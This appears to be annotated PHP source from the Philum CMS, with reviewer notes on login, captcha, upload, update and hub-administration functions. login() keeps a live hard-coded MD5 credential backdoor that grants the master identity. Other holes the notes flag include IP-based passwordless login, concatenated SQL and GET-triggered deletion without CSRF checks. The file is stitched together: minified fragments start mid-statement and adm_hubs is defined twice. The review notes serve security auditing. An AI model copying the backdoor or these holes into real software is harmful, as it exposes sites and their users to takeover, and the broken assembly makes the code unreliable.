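/**
 * Build the anti-spam challenge markup appended to the tracks form.
 *
 * A four-digit code is generated, handed to the 'imgtxt' plugin to be drawn
 * as an image, and passed through captcha() into the hidden field 'trkscr'.
 * The visitor is expected to type the code into the 'trkscrvrf' input.
 *
 * NOTE(review): captcha() is defined elsewhere. If its output can be reversed
 * or recomputed without a server-side secret, the expected answer travels
 * with the form; confirm it is keyed or stored in the session.
 *
 * @return string HTML fragment with the challenge fields.
 */
function secure_tracks()
{
    // The code used to be substr(microtime(), 2, 4): four digits of the
    // current microsecond fraction, i.e. a value derived from the clock.
    // Draw the same four-digit format from a random source instead.
    $n = function_exists('random_int') ? random_int(0, 9999) : mt_rand(0, 9999);
    $scod = str_pad((string) $n, 4, '0', STR_PAD_LEFT);

    $im = plugin('imgtxt', $scod, "crackman", "ok");
    $ret = hidden('secur', 'trkscr', captcha($scod));

    if (!rstr(15)) {
        // With rstr(15) off the answer is emitted pre-filled in a hidden
        // field, so this path offers no protection against automated posts.
        return $ret . hidden('', 'trkscrvrf', $scod);
    }

    if (prms('nogdf') or !$im) {
        // No image available: the code is printed as plain text, which any
        // HTML parser can read. NOTE(review): treat this fallback as cosmetic.
        $ret .= btn('txtcadr', $scod);
    } else {
        $ret .= $im;
    }

    // The first argument deliberately closes the attribute to add an id.
    $ret .= autoclic('secure" id="trkscrvrf', helps('track_captcha'), '14', '5', '') . ' ';

    return $ret;
}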
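/**
 * Authenticate a visitor, or walk them through account / hub creation.
 *
 * Order of evaluation:
 *  1. name + password accepted by verif_user()  -> log in, refresh stored ip;
 *  2. name is the literal 'login'               -> address-based login when
 *                                                  rstr(73) is on;
 *  3. verif_user($user, '') is truthy           -> count a failed attempt,
 *                                                  alert_user() from the 3rd;
 *  4. otherwise                                 -> refuse, or create the
 *                                                  account / hub depending on
 *                                                  prmb(11), create_hub, auth().
 *
 * Changes compared with the previous version:
 *  - the posted create_hub value is passed through normalize() like $user,
 *    because it can replace $user before adduser()/makenew();
 *  - the mail address is validated with FILTER_VALIDATE_EMAIL instead of a
 *    bare "contains @" test, which also rejects CR/LF and other control
 *    characters before the value reaches message2newuser();
 *  - the built-in digest is compared with ===;
 *  - $_POST / $_SESSION reads no longer rely on undefined indexes.
 *
 * @param string $user name typed by the visitor
 * @param string $pasw password typed by the visitor
 * @param string $mail mail address (only needed for account creation)
 * @param string $cook forwarded untouched to log_result()
 *
 * @return mixed result of log_result()/loged()/lj()/form()/alert_user();
 *               null on the account-creation path and when no branch matches
 */
function login($user, $pasw, $mail, $cook = '')
{
    $user = normalize($user);
    $pasw = normalize($pasw);
    $newhub = isset($_POST['create_hub']) ? normalize($_POST['create_hub']) : null;
    $qdu = ses('qdu');
    $qb = ses('qb');
    $host = hostname();

    // NOTE(review): hard-coded credential. Any name/password pair whose
    // unsalted MD5 equals this constant receives the identity held in
    // ses('master'), independently of the user table, and the same constant
    // ships with every copy of this file. Recommend removing it, or replacing
    // it with a per-install secret checked with password_verify().
    if (md5($user . $pasw) === 'df66a9ca7bc0d62e580dc575ccc9ba23') {
        $_SESSION['USE'] = ses('master');
    }
    //$ath=array_flip(authes_levels());

    //log
    $iq = verif_user($user, $pasw);
    if ($iq) {
        // NOTE(review): $user is concatenated into the WHERE clause. Safety
        // depends entirely on normalize() (defined elsewhere) removing quotes;
        // prefer a bound parameter if sql() supports one.
        list($ip, $userhub) = sql('ip,hub', 'qdu', 'r', 'name="' . $user . '"');
        if ($ip != $host) {
            update('qdu', 'ip', $host, 'name', $user);
        }
        if ($userhub) {
            $qb = $user;
        }
        return log_result($user, $iq, $qb, '', $cook);
    } elseif ($user == 'login') {
        //is_numeric($ath[$user])
        if (!rstr(73)) {
            return loged($user, '', '');
        }
        // NOTE(review): from here a session is opened without any password,
        // purely because the stored ip equals hostname(). Clients behind the
        // same NAT or proxy share that value; confirm what hostname() returns
        // and whether it can be influenced by request headers. $host is also
        // concatenated into SQL below.
        list($iq, $ip) = ser("id,ip", $qdu . ' WHERE name="' . $qb . '"');
        if ($ip == $host) {
            return log_result($qb, $iq, $qb, '', $cook);
        }
        list($iq, $USE) = ser("id,name", $qdu . ' WHERE ip="' . $host . '"');
        if ($iq) {
            return log_result($USE, $iq, $qb, '', $cook);
        }
        return lj('small', "valid_loged", 'bruu! ' . helps('log_no'));
    }

    //bad passw
    $iq = verif_user($user, '');
    $exist = isgoodhubname($user);
    $first = sql('id', 'qdu', 'v', 'id=1');

    if ($iq) {
        // NOTE(review): the counter lives in the visitor's own session, so it
        // restarts whenever the session cookie is dropped. A limit keyed on
        // the account name or the source address would survive that.
        if (!isset($_SESSION['tentativ'])) {
            $_SESSION['tentativ'] = 0;
        }
        $_SESSION['tentativ'] += 1;
        if ($_SESSION['tentativ'] >= 3) {
            return alert_user($user);
        }
        return lj('small', "valid_loged", 'bruu! ' . helps('log_nopass'));
    } elseif (prmb(11) == 0 && !$newhub && $first && !auth(5)) {
        return lj('small', "valid_loged", 'bruu! ' . helps('log_nohub'));
    } elseif ($exist == true) {
        return lj('small', "valid_loged", 'bruu! ' . $user . ' ' . nms(37));
    } elseif (prmb(11) >= 1 or $newhub or !$first or prms('create_hub') == "on") {
        $rl = "ok";

        // Ask for a mail address until a syntactically valid one is given.
        // FILTER_VALIDATE_EMAIL refuses non-ASCII local parts; relax this only
        // together with explicit CR/LF filtering.
        if (!$mail or filter_var($mail, FILTER_VALIDATE_EMAIL) === false) {
            $tfield = divc("txtcadr", helps('log_newser') . ' ' . prmb(11));
            // NOTE(review): the chosen password is written back into the page
            // as a hidden field; keeping it in the session would avoid
            // exposing it in HTML and browser caches.
            $tfield .= hidden('user', '', $user) . hidden('pass', '', $pasw);
            // && binds tighter than 'or': the last two tests form one group.
            if (auth(6) or !$first or prmb(11) >= 6 && prms('create_hub') == "on") {
                $tfield .= hidden('create_hub', '', $user);
            }
            $tfield .= autoclic('mail', 'mail?', '20', '100', '') . ' ';
            $tfield .= input2('submit', 'envoyer', "ok", 'txtbox') . ' ';
            $tfield .= lj('txtx', 'valid_loged', picto('left'));
            return form('/?log=on', $tfield);
        }

        if (!empty($_POST['mail']) or $newhub) {
            // NOTE(review): isgoodhubname() above was run on the typed name,
            // not on the posted hub name that may replace it here.
            $user = $newhub ? $newhub : $user;
        } elseif (!empty($_SESSION['USE'])) {
            $user = $_SESSION['USE'];
        }

        if ($user != 'admin') {
            $iq = adduser($qb, $user, $pasw, $mail);
        } //add_user

        if (prmb(11) >= 6 or $newhub or !$first) {
            modif_cnfgtxt($user, $first); //add_hub
            $qb = makenew($user);
            // NOTE(review): the password is handed to the mailer in clear.
            message2newuser($user, $mail, $pasw);
            $_SESSION['auth'] = '';
        }

        $_SESSION['qbin']['adminmail'] = $mail;
        // NOTE(review): every other path returns log_result(); here the result
        // is discarded and the function returns null. Confirm this is intended.
        log_result($user, $iq, $qb, $rl, $cook);
    }
}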
/**
 * Start the program update when a newer version is advertised.
 *
 * Runs only for sessions whose 'auth' level is above 5, when no 'dlnb' flag
 * is set in the session and the 'aupdate' parameter is off. If the value
 * returned by sesmk('checkupdate', '') is greater than ses('philum'), the
 * request is rewritten to ?update=program and plug/distribution.php is loaded.
 *
 * NOTE(review): what plug/distribution.php fetches and installs is not
 * visible here. If it downloads code, confirm the transport is authenticated
 * and the payload is integrity-checked before it is written to disk.
 *
 * @return void
 */
function verif_update()
{
    // Same short-circuit order as the original conjunction.
    if (!($_SESSION['auth'] > 5) || $_SESSION['dlnb'] || prms('aupdate')) {
        return;
    }

    $advertised = sesmk('checkupdate', '');
    if (!($advertised > ses('philum'))) {
        return;
    }

    $_GET['update'] = 'program';
    require_once 'plug/distribution.php';
}
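/**
 * Store the file posted in $_FILES['fichier'] and return its relative path.
 *
 * The target directory depends on the extension and on the $_GET switches
 * (mode=banim|disk, avnim, edit_css, bkgim); errors are collected in one
 * message and shown through alert().
 *
 * Changes compared with the previous version:
 *  - the extension is matched exactly against the allow-list. The old
 *    substring test accepted any fragment of a listed extension, and the
 *    list stripped of ".php"/".js" was computed but never consulted;
 *  - extensions beginning with "php", plus js/phtml/phar, are removed from
 *    the list even when the admin-defined extras contain them;
 *  - a mode=disk directory containing "..", a backslash or a NUL is refused;
 *  - directories are only created, and the file only unpacked / attached to
 *    the article, when the upload was accepted and actually moved;
 *  - locals are initialised and request keys are read defensively.
 *
 * NOTE(review): no permission test is visible in this function; confirm the
 * caller restricts who can reach it, in particular for mode=disk, where the
 * directory name comes from the request.
 *
 * @return string directory + file name (an empty string when no file came in)
 */
function save_img()
{
    $qb = $_SESSION['qb'];
    $read = $_SESSION['read'];
    $fich = $_FILES['fichier']['name'];
    $fich_tmp = $_FILES['fichier']['tmp_name'];
    $xt = xt($fich);
    $fich = normalize($fich);
    $fich = str_replace("-", "", $fich);

    $exp_out = '';
    $rep = '';
    $mg = '';
    $w = '';
    $mode = isset($_GET['mode']) ? $_GET['mode'] : '';

    if ($fich == "") {
        $exp_out .= "no file uploaded ";
    } else {
        // Built-in list plus admin-defined extras. The two are split
        // separately so a missing leading dot in the extras cannot glue
        // itself onto the last built-in entry.
        $base = ".mp4.m4a.mov.mpg.mp3.wav.wmv.asf.rmv.ram.rm.swf.flv.jpg.png.gif.pdf.txt.rar.zip.tar.gz";
        $extra = isset($_SESSION['prmb'][23]) ? (string) $_SESSION['prmb'][23] : '';
        $allowed = array();
        foreach (array_merge(explode('.', $base), explode('.', $extra)) as $e) {
            $e = strtolower(trim($e));
            if ($e === '') {
                continue;
            }
            // Never accept types a web server may execute or serve as script.
            // Which extensions are executable depends on server configuration;
            // review this list against the deployment.
            if (strpos($e, 'php') === 0 || in_array($e, array('js', 'phtml', 'phar'), true)) {
                continue;
            }
            $allowed[$e] = true;
        }

        // xt() yields the extension with its leading dot (see the ".rm" and
        // ".tar" comparisons below).
        $ext = strtolower(ltrim((string) $xt, '.'));
        if ($ext === '' || !isset($allowed[$ext])) {
            $exp_out .= $xt . '=forbidden ; authorized=.' . implode('.', array_keys($allowed)) . br();
        }

        $poids = $_FILES['fichier']['size'] / 1024;
        $uplimit = prms('uplimit') * 1000;
        if ($poids >= $uplimit || $poids == 0) {
            $exp_out .= "{$poids} > 250Mo ";
        }

        if ($xt == ".rm") {
            $fich .= "v";
        }

        // Directory by media family.
        $rep = 'img/';
        if (stristr(".m4a.mpg.mp4.asf.rmv.wmv.flv", $xt) !== false) {
            $rep = 'video/';
        } elseif (stristr(".rar.swf.txt.pdf", $xt) !== false) {
            $rep = 'docs/';
        } elseif (stristr(".mp3", $xt) !== false) {
            $rep = 'mp3/';
        }
        if (stristr(".txt.mp3.pdf.swf", $xt) !== false) {
            $rep = 'users/' . $qb . '/' . $rep;
        } elseif (stristr(".jpg.png.gif", $xt) === false) {
            $rep = 'users/' . $qb . '/' . $rep;
        }

        // Suffix appended to the reference inserted in the article.
        if (stristr(".jpg.png.gif.mp3.mp4.pmg.swf.wmv.flv.pdf", $xt) === false) {
            $w = ':w';
        }
        if (stristr(".txt", $xt) !== false) {
            $w = ':scrut';
        }

        $make_tree = false;
        if ($mode == "banim") {
            $mg = 'ban_' . $qb . '.jpg';
        } elseif (isset($_GET['avnim']) && $_GET['avnim'] == "ok") {
            $mg = 'avatar_' . $_SESSION['USE'] . '.gif';
            $rep = 'imgb/';
        } elseif (!empty($_GET['edit_css'])) {
            $mg = 'css_' . $qb . '_' . $fich;
            $rep = 'imgb/';
        } elseif (isset($_GET['bkgim']) && $_GET['bkgim'] == "ok") {
            $mg = 'bkg_' . $qb . '.jpg';
            $rep = 'imgb/';
        } elseif ($mode == "disk") {
            $opdir = isset($_GET['opdir']) ? $_GET['opdir'] : '';
            $dir = (string) ajx($opdir, 1);
            $rep = 'users/' . $dir . '/';
            $mg = $fich;
            // The directory name comes from the request: keep it below users/.
            if (strpos($dir, '..') !== false || strpos($dir, '\\') !== false || strpos($dir, "\0") !== false) {
                $exp_out .= "upload refused: invalid directory ";
            } elseif ($opdir != $qb) {
                $make_tree = true;
            }
        } else {
            $mg = $qb . '_' . $read . '_' . $fich;
        }

        // Touch the file system only for an accepted upload.
        if (!$exp_out) {
            if ($make_tree) {
                mkdir_r($rep);
            }
            if (!is_dir($rep)) {
                // NOTE(review): 0777 leaves the directory writable by every
                // local account; tighten if the hosting setup allows it.
                mkdir($rep, 0777);
            }
        }

        if (is_uploaded_file($fich_tmp) && !$exp_out) {
            if (!move_uploaded_file($fich_tmp, $rep . $mg)) {
                $exp_out .= " not saved";
            } else {
                if ($xt == '.tar' or $xt == '.gz') {
                    // NOTE(review): the archive is expanded into the served
                    // directory and its entries are not checked against the
                    // allow-list here; confirm unpack_gz() filters entry names
                    // and types.
                    unpack_gz($rep . $mg, $rep);
                }
                if ($read && !$mode) {
                    add_im_img($mg);
                    if (empty($_POST["imnot"])) {
                        add_im_msg("", $rep . $mg . $w);
                    }
                }
            }
        } else {
            $exp_out .= "upload refused: {$rep}{$mg}";
        }
    } //end_no_file

    if ($exp_out) {
        alert($exp_out);
    }

    return $rep . $mg;
}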
reset_ses(); prog($g, 1); } if ($_GET['dev']) { $_SESSION['dev'] = $_GET['dev']; relod('/reload'); } //master_params if (!$_SESSION['qd'] or $cache) { master_params('params/_' . $db, $qd, $aqb, $subd); } if (!$_SESSION['philum']) { $_SESSION['philum'] = msql_read('system', 'program_version', 1); } //philum date_default_timezone_set(prms('timez')); if ($_SESSION['dev']) { error_report(); } if (!$_SESSION['mn'] or $cache) { define_hubs(); } //hubs if ($cache) { define_qb(); } //qb::need $mn if (isset($_GET['rebuild_img'])) { $_GET['read'] = $_SESSION['read']; } $cache = deductions_from_read($_GET['read'], $cache);
$ret .= meta('property', 'og:description', $meta["descript"]); } else { $ret .= meta('name', 'title', $meta["title"]); $ret .= meta('name', 'image', $meta["img"]); $ret .= meta('name', 'description', $meta["descript"]); } //$ret.=meta('name','author',$_SESSION['rqt'][$read][7]); //$ret.=meta('name','language',$_SESSION['opts']['lang']); $ret .= meta('name', 'category', $_SESSION['frm']); $ret .= meta('name', 'generator', 'philum_' . $_SESSION['philum']); //needed $ret .= meta('name', 'hub', $_SESSION['qb']); //$ret.=meta('name','copyright','GNU/GPLv3'); $ret .= meta('name', 'viewport', 'user-scalable=no, initial-scale=1, minimum-scale=1, maximum-scale=1, width=device-width'); //prmb(4) $ret .= meta('name', 'google-site-verification', prms('goog')); $ret .= css_link('/css/_global.css' . $cst); //css $ret .= css_link('/css/_pictos.css' . $cst); //icons if ($_GET['admin'] or $_GET['msql']) { $ret .= css_link('/css/_admin.css'); } else { $ret .= css_link('/css/' . $meta["css"] . '.css' . $cst); } $ret .= js_code('cutat=' . $_SESSION['jbuffer'] . '; fixpop="' . $_SESSION['mobile'] . '"; fulpop="1"; read="' . $read . '"; flow="' . $flow . '";'); $ret .= js_link('/prog' . $g . '/ajx.js'); //ajax $ret .= js_link('/prog' . $g . '/utils.js'); //js
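/**
 * Render the hub administration panel and execute the action requested
 * through the query string (rename, delete, reset, publish / unpublish).
 *
 * Changes compared with the previous version:
 *  - hub deletion is refused when the session hub name is empty or contains
 *    a path separator or "..": the directory to erase is 'users/' . $qb, so
 *    an empty name would have pointed at the whole users/ tree;
 *  - $ret is initialised and request keys are read without undefined-index
 *    notices; the never-defined $id (always empty) is dropped from the
 *    publish link, which renders the same URL;
 *  - the dead "$mna && ..." branch ($mna was never set before it) is removed.
 *
 * NOTE(review): every action here changes state from a GET parameter and
 * only $auth is tested; no anti-CSRF token is checked inside this function.
 * A link opened by a logged-in admin is enough to trigger kill_hub=ok.
 * Confirm a token is enforced upstream, or move these actions to POST with
 * a per-session token.
 *
 * @param int $auth authorisation level of the current user
 *
 * @return string HTML of the panel
 */
function adm_hubs($auth)
{
    $goto = '/?admin=hubs';
    $qb = ses('qb');
    $qdu = ses('qdu');
    $USE = ses('USE'); // unused below; call kept as in the original
    $mna = ses('mn');  // only used by the disabled node list
    $ret = '';

    $rename = isset($_GET['rename_hub']) ? $_GET['rename_hub'] : '';
    $kill = isset($_GET['kill_hub']) ? $_GET['kill_hub'] : '';
    $reinit_hub = isset($_GET['reinit_hub']) ? $_GET['reinit_hub'] : '';
    $reinit = isset($_GET['reinit']) ? $_GET['reinit'] : '';
    $publish = isset($_GET['publish']) ? $_GET['publish'] : '';

    //if($mna)$ret.=balc('ul','panel',m_nodes_b($mna,1));
    $ret .= hublist() . br();

    // && binds tighter than 'or'.
    if ($auth >= 6 && prms('create_hub') == 'on' or $auth >= 7) {
        $ret .= loged('', '', 'create new hub', '10') . br();
    }

    //rename_hub
    if ($rename && $auth >= 5) {
        if (!empty($_POST['hub_name'])) {
            // NOTE(review): the posted name is only trimmed before it is
            // stored and later printed by input2(); confirm update() escapes
            // it for SQL and input2() escapes it for HTML.
            $newname = trim($_POST['hub_name']);
            $_SESSION['mn'][$qb] = $newname;
            update('qdu', 'hub', $newname, 'name', $qb);
        }
        $valu = input2('text', 'hub_name', $_SESSION['mn'][$qb], 'txtx');
        $valu .= input2('submit', 'Submit', 'rename_hub', '');
        $ret .= form($goto . '&rename_hub==', btn('panel', $valu)) . br();
    } elseif ($auth >= 5) {
        $ret .= lkc('popsav', $goto . '&rename_hub==', nms(87)) . ' ';
    }

    //kill_hub
    if ($auth >= 6 && $kill === 'ok') {
        $name = (string) $qb;
        $unsafe = $name === ''
            || strpos($name, '/') !== false
            || strpos($name, '\\') !== false
            || strpos($name, '..') !== false;
        if ($unsafe) {
            $ret .= btn('txtx', 'hub not removed: invalid hub name') . br();
        } else {
            $f = 'users/' . $name;
            walk_dir($f, 'remove');
            rmdir($f);
            $f = 'msql/users/' . $name . '_cache.php';
            if (is_file($f)) {
                unlink($f);
            }
            for ($i = 1; $i < 10; $i++) {
                $targets = array(
                    'msql/design/' . $name . '_design_' . $i . '.php',
                    'msql/design/' . $name . '_clrset_' . $i . '.php',
                    'msql/users/' . $name . '_mods_' . $i . '.php',
                );
                foreach ($targets as $f) {
                    if (is_file($f)) {
                        unlink($f);
                    }
                }
            }
            // NOTE(review): statement built by concatenation; $qb comes from
            // the session. Use a bound parameter if msquery() allows it.
            msquery('DELETE FROM ' . $qdu . ' WHERE name="' . $qb . '" LIMIT 1');
            $_SESSION['USE'] = '';
            relod(subdom(prms('default_hub')));
        }
    }

    //reinit_hub
    if ($auth >= 6 && $reinit_hub === 'ok') {
        makenew(ses('qb'), 1);
    }

    //publish
    if ($auth >= 6) {
        if ($publish) {
            $actv = ($publish == 'off') ? 0 : 1;
            update('qdu', 'active', $actv, 'name', $qb);
        }
        $opened = rse('active', $qdu . ' WHERE name="' . $qb . '"');
        if ($opened == '1') {
            $ere = 'off';
            $st = nms(130);
        } else {
            $ere = 'on';
            $st = nms(131);
        }
        $ret .= lkc('popsav', $goto . '&publish=' . $ere . '#', offon($opened) . ' ' . $st) . ' ';
        $ret .= lkc('popsav', $goto . '&reinit==', nms(95) . ' ' . nms(103)) . ' ';
    }

    // Confirmation step before the reset.
    if ($reinit === '=') {
        $ret .= btn('txtx', 'restore all defaults ?') . lkc('txtyl', $goto . '&reinit_hub=ok', 'ok') . ' ';
    }

    if ($auth >= 6) {
        $ret .= lkc('txtyl', $goto . '&kill_hub==', nms(76) . ' ' . nms(100)) . ' ';
        // Confirmation step before the deletion.
        if ($kill === '=') {
            $ret .= btn('txtx', 'All datas will be lost') . lkc('txtyl', $goto . '&kill_hub=ok', 'ok');
        }
    }

    return $ret . br();
}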
/**
 * Base URL of the server the program contacts for updates.
 *
 * The 'upservr' parameter wins when it is set (passed through http());
 * otherwise the built-in default is returned.
 *
 * NOTE(review): the default is a plain-http URL. If program files are
 * downloaded from it, anyone on the network path can alter them; confirm the
 * updater verifies what it receives, or that an https endpoint is configured.
 *
 * @return string
 */
function philum()
{
    $configured = prms('upservr');
    if ($configured) {
        return http($configured);
    }

    return 'http://philum.net';
}
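/**
 * Render the hub administration panel and execute the action requested
 * through the query string (rename, reset, publish / unpublish). Hub deletion
 * is only linked from here; the call that performs it is commented out.
 *
 * Changes compared with the previous version:
 *  - $ret is initialised and request keys are read without undefined-index
 *    notices; the never-defined $id (always empty) is dropped from the
 *    publish link, which renders the same URL;
 *  - the dead "$mna && ..." branch ($mna was never set before it) is removed.
 *
 * NOTE(review): the actions change state from a GET parameter and only
 * $auth is tested; no anti-CSRF token is checked inside this function.
 * Confirm a token is enforced upstream, or move them to POST with a
 * per-session token.
 *
 * @param int $auth authorisation level of the current user
 *
 * @return string HTML of the panel, followed by the hub list
 */
function adm_hubs($auth)
{
    $goto = '/?admin=hubs';
    $qb = ses('qb');
    $qdu = ses('qdu'); // unused below; call kept as in the original
    $USE = ses('USE'); // unused below; call kept as in the original
    $mna = ses('mn');  // unused below; call kept as in the original
    $ret = '';

    $rename = isset($_GET['rename_hub']) ? $_GET['rename_hub'] : '';
    $kill = isset($_GET['kill_hub']) ? $_GET['kill_hub'] : '';
    $reinit_hub = isset($_GET['reinit_hub']) ? $_GET['reinit_hub'] : '';
    $reinit = isset($_GET['reinit']) ? $_GET['reinit'] : '';
    $publish = isset($_GET['publish']) ? $_GET['publish'] : '';

    // && binds tighter than 'or'.
    if ($auth >= 6 && prms('create_hub') == 'on' or $auth >= 7) {
        $ret .= loged('', '', 'create new hub') . br();
    }

    //rename_hub
    if ($rename && $auth >= 5) {
        if (!empty($_POST['hub_name'])) {
            // NOTE(review): the posted name is only trimmed before it is
            // stored and later printed by input2(); confirm update() escapes
            // it for SQL and input2() escapes it for HTML.
            $newname = trim($_POST['hub_name']);
            $_SESSION['mn'][$qb] = $newname;
            update('qdu', 'hub', $newname, 'name', $qb);
        }
        $valu = input2('text', 'hub_name', $_SESSION['mn'][$qb], 'txtx');
        $valu .= input2('submit', 'Submit', 'rename_hub', '');
        $ret .= form($goto . '&rename_hub==', btn('panel', $valu)) . br();
    } elseif ($auth >= 5) {
        $ret .= lkc('popsav', $goto . '&rename_hub==', nms(87)) . ' ';
    }

    //kill_hub
    //if($auth>=6 && $_GET['kill_hub']=='ok')adm_killhub();

    //reinit_hub
    if ($auth >= 6 && $reinit_hub === 'ok') {
        makenew(ses('qb'), 1);
    }

    //publish
    if ($auth >= 6) {
        if ($publish) {
            $actv = ($publish == 'off') ? 0 : 1;
            update('qdu', 'active', $actv, 'name', $qb);
        }
        // NOTE(review): $qb (session value) is concatenated into the WHERE
        // clause; use a bound parameter if sql() supports one.
        $opened = sql('active', 'qdu', 'v', 'name="' . $qb . '"');
        if ($opened == '1') {
            $ere = 'off';
            $st = nms(130);
        } else {
            $ere = 'on';
            $st = nms(131);
        }
        $ret .= lkc('popsav', $goto . '&publish=' . $ere . '#', offon($opened) . ' ' . $st) . ' ';
        $ret .= lkc('popsav', $goto . '&reinit==', nms(95) . ' ' . nms(103)) . ' ';
    }

    // Confirmation step before the reset.
    if ($reinit === '=') {
        $ret .= btn('txtx', 'restore all defaults ?') . lkc('txtyl', $goto . '&reinit_hub=ok', 'ok') . ' ';
    }

    if ($auth >= 6) {
        $ret .= lkc('txtred', $goto . '&kill_hub==', nms(76) . ' ' . nms(100)) . ' ';
        // Confirmation step; the link it offers targets kill_hub=ok, which is
        // not handled in this function.
        if ($kill === '=') {
            $ret .= btn('txtx', 'All datas will be lost') . lkc('txtyl', $goto . '&kill_hub=ok', 'ok');
        }
    }

    return $ret . br() . br() . hublist();
}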